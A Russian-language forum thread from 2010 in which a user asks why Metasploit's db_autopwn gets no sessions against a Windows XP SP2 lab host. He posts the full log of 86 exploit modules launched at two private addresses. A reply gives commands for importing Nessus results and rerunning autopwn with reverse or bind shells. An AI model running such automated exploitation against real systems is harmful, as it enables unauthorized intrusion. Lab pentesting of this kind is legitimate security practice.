Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)
-   -   Metasploit autopwn (https://forum.antichat.xyz/showthread.php?t=192553)

-fader- 01.04.2010 19:49
Metasploit autopwn
 
Использую данную программу для пентеста чистой Windows XP SP2, однако она не создает сессий.
Ручками эксплуатирую, все прокатывает, а с ней никак :(

msf > db_driver[*] Active Driver: sqlite3[*] Available: sqlite3
[*] DB Support: Enable the mysql driver with the following command:[*] $ gem install mysql[*] This gem requires mysqlclient headers, which can be installed on Ubuntu with:[*] $ sudo apt-get install libmysqlclient-dev
[*] DB Support: Enable the postgresql driver with the following command:[*] $ gem install postgres-pr

msf > db_create client[*] The specified database already exists, connecting[*] Successfully connected to the database[*] File: client
msf > db_nmap 192.168.1.5

Starting Nmap 5.00 ( http://nmap.org ) at 2010-03-31 20:17 MSD
Interesting ports on 192.168.1.5:
Not shown: 996 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2869/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds
msf > db_autopwn -p -t -e[*] Analysis completed in 6 seconds (0 vulns / 0 refs)[*] [*] ================================================== ==============================[*] Matching Exploit Modules[*] ================================================== ==============================[*] 192.168.1.5:135 exploit/windows/dcerpc/ms03_026_dcom (port match)[*] 192.168.1.5:139 exploit/linux/samba/lsa_transnames_heap (port match)[*] 192.168.1.5:139 exploit/multi/samba/nttrans (port match)[*] 192.168.1.5:139 exploit/multi/samba/usermap_script (port match)[*] 192.168.1.5:139 exploit/netware/smb/lsass_cifs (port match)[*] 192.168.1.5:139 exploit/osx/samba/lsa_transnames_heap (port match)[*] 192.168.1.5:139 exploit/solaris/samba/trans2open (port match)[*] 192.168.1.5:139 exploit/windows/brightstor/ca_arcserve_342 (port match)[*] 192.168.1.5:139 exploit/windows/brightstor/etrust_itm_alert (port match)[*] 192.168.1.5:139 exploit/windows/smb/ms03_049_netapi (port match)[*] 192.168.1.5:139 exploit/windows/smb/ms04_011_lsass (port match)[*] 192.168.1.5:139 exploit/windows/smb/ms04_031_netdde (port match)[*] 192.168.1.5:139 exploit/windows/smb/ms05_039_pnp (port match)[*] 192.168.1.5:139 exploit/windows/smb/ms06_040_netapi (port match)[*] 192.168.1.5:139 exploit/windows/smb/ms06_066_nwapi (port match)[*] 192.168.1.5:139 exploit/windows/smb/ms06_066_nwwks (port match)[*] 192.168.1.5:139 exploit/windows/smb/ms06_070_wkssvc (port match)[*] 192.168.1.5:139 exploit/windows/smb/ms08_067_netapi (port match)[*] 192.168.1.5:139 exploit/windows/smb/msdns_zonename (port match)[*] 192.168.1.5:139 exploit/windows/smb/netidentity_xtierrpcpipe (port match)[*] 192.168.1.5:139 exploit/windows/smb/psexec (port match)[*] 192.168.1.5:139 exploit/windows/smb/timbuktu_plughntcommand_bof (port match)[*] 192.168.1.5:445 exploit/linux/samba/lsa_transnames_heap (port match)[*] 192.168.1.5:445 exploit/multi/samba/nttrans (port match)[*] 192.168.1.5:445 exploit/multi/samba/usermap_script (port match)[*] 192.168.1.5:445 exploit/netware/smb/lsass_cifs (port match)[*] 192.168.1.5:445 exploit/osx/samba/lsa_transnames_heap (port match)[*] 192.168.1.5:445 exploit/solaris/samba/trans2open (port match)[*] 192.168.1.5:445 exploit/windows/brightstor/ca_arcserve_342 (port match)[*] 192.168.1.5:445 exploit/windows/brightstor/etrust_itm_alert (port match)[*] 192.168.1.5:445 exploit/windows/smb/ms03_049_netapi (port match)[*] 192.168.1.5:445 exploit/windows/smb/ms04_011_lsass (port match)[*] 192.168.1.5:445 exploit/windows/smb/ms04_031_netdde (port match)[*] 192.168.1.5:445 exploit/windows/smb/ms05_039_pnp (port match)[*] 192.168.1.5:445 exploit/windows/smb/ms06_040_netapi (port match)[*] 192.168.1.5:445 exploit/windows/smb/ms06_066_nwapi (port match)[*] 192.168.1.5:445 exploit/windows/smb/ms06_066_nwwks (port match)[*] 192.168.1.5:445 exploit/windows/smb/ms06_070_wkssvc (port match)[*] 192.168.1.5:445 exploit/windows/smb/ms08_067_netapi (port match)[*] 192.168.1.5:445 exploit/windows/smb/msdns_zonename (port match)[*] 192.168.1.5:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match)[*] 192.168.1.5:445 exploit/windows/smb/psexec (port match)[*] 192.168.1.5:445 exploit/windows/smb/timbuktu_plughntcommand_bof (port match)[*] 192.168.1.6:135 exploit/windows/dcerpc/ms03_026_dcom (port match)[*] 192.168.1.6:139 exploit/linux/samba/lsa_transnames_heap (port match)[*] 192.168.1.6:139 exploit/multi/samba/nttrans (port match)[*] 192.168.1.6:139 exploit/multi/samba/usermap_script (port match)[*] 192.168.1.6:139 exploit/netware/smb/lsass_cifs (port match)[*] 192.168.1.6:139 exploit/osx/samba/lsa_transnames_heap (port match)[*] 192.168.1.6:139 exploit/solaris/samba/trans2open (port match)[*] 192.168.1.6:139 exploit/windows/brightstor/ca_arcserve_342 (port match)[*] 192.168.1.6:139 exploit/windows/brightstor/etrust_itm_alert (port match)[*] 192.168.1.6:139 exploit/windows/smb/ms03_049_netapi (port match)[*] 192.168.1.6:139 exploit/windows/smb/ms04_011_lsass (port match)[*] 192.168.1.6:139 exploit/windows/smb/ms04_031_netdde (port match)[*] 192.168.1.6:139 exploit/windows/smb/ms05_039_pnp (port match)[*] 192.168.1.6:139 exploit/windows/smb/ms06_040_netapi (port match)[*] 192.168.1.6:139 exploit/windows/smb/ms06_066_nwapi (port match)[*] 192.168.1.6:139 exploit/windows/smb/ms06_066_nwwks (port match)[*] 192.168.1.6:139 exploit/windows/smb/ms06_070_wkssvc (port match)[*] 192.168.1.6:139 exploit/windows/smb/ms08_067_netapi (port match)[*] 192.168.1.6:139 exploit/windows/smb/msdns_zonename (port match)[*] 192.168.1.6:139 exploit/windows/smb/netidentity_xtierrpcpipe (port match)[*] 192.168.1.6:139 exploit/windows/smb/psexec (port match)[*] 192.168.1.6:139 exploit/windows/smb/timbuktu_plughntcommand_bof (port match)[*] 192.168.1.6:445 exploit/linux/samba/lsa_transnames_heap (port match)[*] 192.168.1.6:445 exploit/multi/samba/nttrans (port match)[*] 192.168.1.6:445 exploit/multi/samba/usermap_script (port match)[*] 192.168.1.6:445 exploit/netware/smb/lsass_cifs (port match)[*] 192.168.1.6:445 exploit/osx/samba/lsa_transnames_heap (port match)[*] 192.168.1.6:445 exploit/solaris/samba/trans2open (port match)[*] 192.168.1.6:445 exploit/windows/brightstor/ca_arcserve_342 (port match)[*] 192.168.1.6:445 exploit/windows/brightstor/etrust_itm_alert (port match)[*] 192.168.1.6:445 exploit/windows/smb/ms03_049_netapi (port match)[*] 192.168.1.6:445 exploit/windows/smb/ms04_011_lsass (port match)[*] 192.168.1.6:445 exploit/windows/smb/ms04_031_netdde (port match)[*] 192.168.1.6:445 exploit/windows/smb/ms05_039_pnp (port match)[*] 192.168.1.6:445 exploit/windows/smb/ms06_040_netapi (port match)[*] 192.168.1.6:445 exploit/windows/smb/ms06_066_nwapi (port match)[*] 192.168.1.6:445 exploit/windows/smb/ms06_066_nwwks (port match)[*] 192.168.1.6:445 exploit/windows/smb/ms06_070_wkssvc (port match)[*] 192.168.1.6:445 exploit/windows/smb/ms08_067_netapi (port match)[*] 192.168.1.6:445 exploit/windows/smb/msdns_zonename (port match)[*] 192.168.1.6:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match)[*] 192.168.1.6:445 exploit/windows/smb/psexec (port match)[*] 192.168.1.6:445 exploit/windows/smb/timbuktu_plughntcommand_bof (port match)[*] ================================================== ==============================[*] [*] [*] (1/86 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.5:135...[*] (2/86 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.5:139...[*] (3/86 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.5:139...[*] (4/86 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.5:139...[*] (5/86 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.5:139...[*] (6/86 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.5:139...[*] (7/86 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.5:139...[*] (8/86 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.5:139...[*] (9/86 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.5:139...[*] (10/86 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.5:139...[*] (11/86 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.5:139...[*] (12/86 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.5:139...[*] (13/86 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.5:139...[*] (14/86 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.5:139...[*] (15/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.5:139...[*] (16/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.5:139...[*] (17/86 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.5:139...[*] (18/86 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.5:139...[*] (19/86 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.5:139...[*] (20/86 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.5:139...[*] (21/86 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.5:139...[*] (22/86 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.5:139...[*] (23/86 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.5:445...[*] (24/86 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.5:445...[*] (25/86 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.5:445...[*] (26/86 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.5:445...[*] (27/86 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.5:445...[*] (28/86 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.5:445...[*] (29/86 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.5:445...[*] (30/86 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.5:445...[*] (31/86 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.5:445...[*] (32/86 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.5:445...[*] (33/86 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.5:445...[*] (34/86 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.5:445...[*] (35/86 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.5:445...[*] (36/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.5:445...[*] (37/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.5:445...[*] (38/86 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.5:445...[*] (39/86 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.5:445...[*] (40/86 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.5:445...[*] (41/86 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.5:445...[*] (42/86 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.5:445...[*] (43/86 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.5:445...[*] (44/86 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.6:135...[*] (45/86 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.6:139...[*] (46/86 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.6:139...[*] (47/86 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.6:139...[*] (48/86 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.6:139...[*] (49/86 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.6:139...[*] (50/86 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.6:139...[*] (51/86 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.6:139...[*] (52/86 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.6:139...[*] (53/86 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.6:139...[*] (54/86 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.6:139...[*] (55/86 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.6:139...[*] (56/86 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.6:139...[*] (57/86 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.6:139...[*] (58/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.6:139...[*] (59/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.6:139...[*] (60/86 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.6:139...[*] (61/86 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.6:139...[*] (62/86 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.6:139...[*] (63/86 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.6:139...[*] (64/86 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.6:139...[*] (65/86 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.6:139...[*] (66/86 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.6:445...[*] (67/86 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.6:445...[*] (68/86 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.6:445...[*] (69/86 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.6:445...[*] (70/86 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.6:445...[*] (71/86 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.6:445...[*] (72/86 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.6:445...[*] (73/86 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.6:445...[*] (74/86 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.6:445...[*] (75/86 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.6:445...[*] (76/86 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.6:445...[*] (77/86 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.6:445...[*] (78/86 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.6:445...[*] (79/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.6:445...[*] (80/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.6:445...[*] (81/86 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.6:445...[*] (82/86 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.6:445...[*] (83/86 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.6:445...[*] (84/86 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.6:445...[*] (85/86 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.6:445...[*] (86/86 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.6:445...[*] (86/86 [0 sessions]): Waiting on 26 launched modules to finish execution...[*] (86/86 [0 sessions]): Waiting on 1 launched modules to finish execution...[*] (86/86 [0 sessions]): Waiting on 1 launched modules to finish execution...[*] (86/86 [0 sessions]): Waiting on 0 launched modules to finish execution...[*] The autopwn command has completed with 0 sessions


ЗЫ: Извините если что, я спойлер не знаю как добавить. Просьба к модератору, отформатировать сообщение, чтобы нормально выглядело, а то я в хтмл не шарю(

eclipze0 11.04.2010 08:58
Попробуй, nessus загрузи проскань свой ip, потом загрузи репорт в формате .nessus. Создай базу данных в метасплоите:

db_create

потом загрузи плюгин:

load db_tracker

загрузи сам отчёт .nessus (предварительно кинув в папку /home/*USER*/ :

db_import_nessus_xml /home/*USER*/1.nessus

Проверь на наличие сторонних хостов:

db_hosts

Если есть сторонние хосты удали их (пример: db_del_host 127.0.0.1)

Проверь порты (точнее правильно ли загрузился отчёт):

db_services

Проверь уязвимости: db_vulns

Как всё проверишь, запускай: db_autopwn -p -e (использовать -t не обязательно он просто выводит список все уязвимостей на порты отчёта)

Попробуй ещё использовать reverse_tcp: db_autopwn -p -e -r или -b


Время: 06:15